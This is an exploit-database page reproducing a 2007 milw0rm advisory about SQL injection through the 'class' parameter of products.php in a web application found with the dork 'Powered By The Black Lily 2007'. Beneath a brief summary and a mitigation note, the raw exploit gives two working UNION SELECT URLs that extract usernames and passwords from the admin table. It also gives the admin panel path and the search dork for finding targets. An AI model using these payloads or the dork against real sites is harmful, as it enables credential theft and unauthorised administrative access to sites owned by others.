header-logo
Suggest Exploit
vendor:
by:
VerY SecReT
7.5
CVSS
HIGH
Arbitrary SQL Injection
89
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Arbitrary SQL Injection in products.php

The vulnerability allows an attacker to perform arbitrary SQL injections by manipulating the 'class' parameter in the 'products.php' page. By injecting a UNION SELECT statement, the attacker can retrieve sensitive information such as usernames and passwords from the 'admin' table.

Mitigation:

The vendor should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, access to sensitive information should be restricted to authorized users.
Source

Exploit-DB raw data:

#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

 found by :
               VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

 Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
  http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

 or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in  http://victim.com/xx/admin/

#####################################

 S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa

# milw0rm.com [2007-09-22]

Navigation

Suggest Exploit

Services By CQR